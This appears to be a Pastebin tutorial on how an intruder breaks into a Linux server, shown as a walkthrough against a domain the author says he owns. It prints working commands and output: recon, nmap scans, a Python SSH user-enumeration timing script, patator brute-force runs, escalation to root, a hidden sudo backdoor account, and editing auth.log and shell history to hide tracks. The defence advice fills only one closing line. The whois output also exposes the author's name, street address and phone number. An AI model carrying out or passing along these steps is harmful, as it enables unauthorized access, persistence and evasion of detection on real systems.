Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- A hacker can get his feet into a network via different techniques, and for different reasons. A network can be targeted from a hacker for what ever reason he has and in this case it will be a target of choice, or it could be just a target of opporunity as he found it by a random scan.
- -“If a network is not a target of choice it doesn't mean that it is safe, because its just a matter of time till it will become a target of opportunity.”-
- Usually hackers will go in these well known steps to gain access over a network,
- 1- Reconnaissance and Foot / Finger printing:- Mainly reconnaissance is the first step of an attack and this phase is mostly about Information gathering. All information that the hacker can gather about the victim even if it seems simple and useless. The hacker can collect this information via different ways, for example,simple dumpster diving around the target's office, checking their staff social network profiles, googling the target and note the information he will got or via Social engineering. The Foot printing process will come after to complete the step. Foot printing is mainly to study the network, for example, how devices are connected together, how many device the network have, infra structure, firewalls, etc.
- “This phase depend on OSINT -Open source intelligence- with no direct contact with the target”
- 2- Scanning:- The attacker will engage within the target for more specific details, for example open ports and running services, lets say we got port 22 open then by a simple telnet command we can figure the SSH version running in the server.
- 3- Enumeration, gaining access and privileges escalation:- Three different processes, firstly Enumeration which will allow the hacker to know the valid accounts that he wants to obtain access for via active connection, for example he knows for the above processes -Reconnaissance, foot printing and scanning- that there is a SSH service running on -default- port 22, via enumerating the hacker can know if a user is valid or not via simple python script. Next step will be reinforcing the valid account. If he succeed to gain an access to the SSH server, then he will try do privileges escalation, if the brute-forced account doesn't have super user power.
- 4- Creating a backdoor and covering tracks:- In this phase the hacker already gained access and he will install a rootkit, backdoor so he guarantee him self a free entrance to the network later on, for example, creating a new user and adding it to the sudo list. Last step will be covering the tracks by updating the logs via deleting his tracks from it.
- A hacker will never delete the logs, as it will get the network administrator attention.
- The above section was a short description in how a hacker can get into a network. The following section will be a real life example to break into a network.
- A real life example,
- Let's say a hacker would like to takeover ashellz.com -It's owned by me- I will try to demonstrate the process step by step according to the above explanation.
- Reconnaissance and Foot printing:-
- Google the target domain ashellz.com
- Whois the target domain.
- root@Mox:/home/allamoox# whois ashellz.com
- Registrant domain : Goddady.com
- Tech Email: allamoox@hotmail.com
- Name Server: NS8015.HOSTGATOR.COM
- Name Server: NS8016.HOSTGATOR.COM
- Tech Name: mahmoud allam
- Tech Organization: aLLamoox
- Tech Street: aol tarik shobar
- Tech City: Tanta
- Tech State/Province: gHARBIA
- Tech Postal Code: 31111
- Tech Country: EG
- Tech Phone: +20.104691184
- Dig the target domain.
- root@Mox:/home/allamoox# dig ashellz.com any -Using dig with the switch any , to show all records.-
- ashellz.com. 14385 IN A 192.185.16.67
- ashellz.com. 86385 IN SOA ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
- ashellz.com. 14385 IN MX 0 mail.ashellz.com.
- ashellz.com. 14385 IN TXT "v=spf1 a mx include:websitewelcome.com ~all"
- ashellz.com. 86385 IN NS ns8016.hostgator.com.
- ashellz.com. 86385 IN NS ns8015.hostgator.com
- These processes can be considered as “passive scan”
- Scanning:-
- Will use nmap with switches O to detect the OS and sS so the connection close before completing the three way handshake.
- root@Mox:/home/allamoox# nmap -O -sS ashellz.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp filtered ssh
- 25/tcp filtered smtp
- 26/tcp open rsftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 135/tcp filtered msrpc
- 139/tcp filtered netbios-ssn
- 143/tcp open imap
- 443/tcp open https
- 445/tcp filtered microsoft-ds
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux 2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%) .
- root@Mox:/home/allamoox# telnet private.ashellz.com 22
- Trying 158.69.197.45...
- Connected to private.ashellz.com.
- Escape character is '^]'.
- SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
- By a simple search about “OpenSSH_6.0p1 Debian-4+deb7u6 ” hacker will know that It's vulnerable to user enumerating..
- These processes can be considered as active scan
- Enumeration:-
- The hacker at this point have a good idea about the target, and which parts are vulnerable and he will start enumerating valid accounts for the SSH service via timing attack technique.
- The technique here depend in the time that our server take to authenticate a user, so we will use a 10kb password to which means if the user doesn't exist then we will get answer from the server faster than an existing user.
- The hacker will use this simple python script to enumerate valid users.
- #Including the paramiko library
- import paramiko
- #Including the time library
- import time
- #Asking for the required username to be checked
- user=raw_input("user: ")
- #Supplying the Password as the letter A repeated 25000 times
- p='A'*25000 -define password as letter A repeated 25000 times-
- ssh = paramiko.SSHClient()
- starttime=time.clock()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- try:
- #Opening a SSH connection with the ashellz.com server with the user that we will chose and a 25000 letter password
- ssh.connect('192.185.16.67', username=user,
- password=p)
- #Giving the taken time to authenticate an user
- except:
- endtime=time.clock()
- total=endtime-starttime
- print(total)”
- python code.py
- Now we get a few valid accounts such as (root, allamoox, allam, test).
- |Gaining access
- Using patator -Python script used for brute forcing a lot of services like FTP, SSH, etc.- against these users list.
- allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/user.txt 0=/home/allamoox/easy_guess.txt -x ignore:mesg='Authentication failed.'
- 17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
- 17:45:12 patator INFO -
- 17:45:12 patator INFO - code size time | candidate | num | mesg
- 17:45:12 patator INFO - -----------------------------------------------------------------------------
- 17:51:22 patator INFO - 0 37 0.204 | test123:test | 1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
- 17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 0h 1m 2s
- The hacker get two accounts in just few minutes because of weak passwords.
- privileges escalation
- Now the hacker get a valid accounts he will check if it is in the sudo list or not via running any command as a super user
- test@aShellz:/home/allamoox$ sudo uptime
- [sudo] password for test:
- test is not in the sudoers file. This incident will be reported.
- test@aShellz:/home/allamoox$ .
- It isn't super user but still its very useful account. The hacker will try to list all the users in the server via this command
- test@aShellz:/home/allamoox$ cat /etc/group
- bin:x:2:
- sys:x:3:
- adm:x:4:
- tty:x:5:
- disk:x:6:
- lp:x:7:
- mail:x:8:
- news:x:9:
- uucp:x:10:
- man:x:12:
- proxy:x:13:
- kmem:x:15:
- dialout:x:20:
- fax:x:21:
- voice:x:22:
- cdrom:x:24:
- floppy:x:25:
- tape:x:26:
- sudo:x:27:allamoox,xenthys,jack3
- audio:x:29:
- dip:x:30:
- www-data:x:33:
- backup:x:34:
- operator:x:37:
- list:x:38:
- irc:x:39:
- src:x:40:
- gnats:x:41:
- shadow:x:42:
- utmp:x:43:
- video:x:44:
- sasl:x:45:
- plugdev:x:46:
- staff:x:50:
- games:x:60:
- users:x:100:
- nogroup:x:65534:
- netdev:x:101:
- input:x:102:
- systemd-journal:x:103:
- systemd-timesync:x:104:
- systemd-network:x:105:
- systemd-resolve:x:106:
- systemd-bus-proxy:x:107:
- ssh:x:108:
- messagebus:x:109:
- Now the hacker will try to hack any of these accounts (sudo:x:27:allamoox,xenthys,jack3) and he will own the server. Again he will try to brute force it via patator but with a bit complicated wordlist.
- allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/20_million_password_list_top_2000000.txt -x ignore:mesg='Authentication failed.'
- 17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
- 17:45:12 patator INFO -
- 17:45:12 patator INFO - code size time | candidate | num | mesg
- 17:45:12 patator INFO - -----------------------------------------------------------------------------
- 17:51:22 patator INFO - 0 37 0.204 | qazxswedc123:jack3 | 1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
- 17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 21h 1m 49s.
- As we can see “jack3” used a pattern password, and it was included in a huge word list, so his account get hacked. The hacker will log as root now.
- jack3@aShellz:/home/jack3$ sudo su
- [sudo] password for jack3:
- root@aShellz:/home/jack3#
- He will add another account and put it in the superusers list, to guarantee himself a free entrance into the server in the future and will use a name like system.
- root@aShellz:/home/allamoox# adduser system
- Adding the user to sudo group
- root@aShellz:/home/allamoox# usermod -G sudo system
- root@aShellz:/home/allamoox# cat /etc/group |grep sudo
- sudo:x:27:jack3,xenthys,allamoox,system
- Then the hacker will clear his tracks from the log.
- To know how many lines, words or characters in the log file.
- root@aShellz:/home# wc /var/logs/auth.log
- 200601 2731431 21813737 logs.txt
- more than 200k lines
- the hack will open the file to delete only his tracks from the log, for example lines as the following
- root@aShellz:/home# nano /var/logs/auth.log
- Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 81.229. port 35784 ssh2
- Sep 25 11:14:43 vps1670 passwd[1891]: pam_unix(passwd:chauthtok): password changed for jack3
- Sep 24 21:50:26 vps1670 groupadd[1948]: group added to /etc/group: name=system, GID=1027
- For sure there are many lines the hacker need to delete, he might use “awk” or “sed” command to delete any line that start with the word failed password under this date Sep 24.
- Last thing the hacker will do is to clear his commands from the history command as well.
- P.S: The hacker can use completely different scenarios depending on the situation.
- A solution could be, a good enforced security policy, and a program like “Fail2ban” to block any brute force attempt, with a decent activated firewall.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement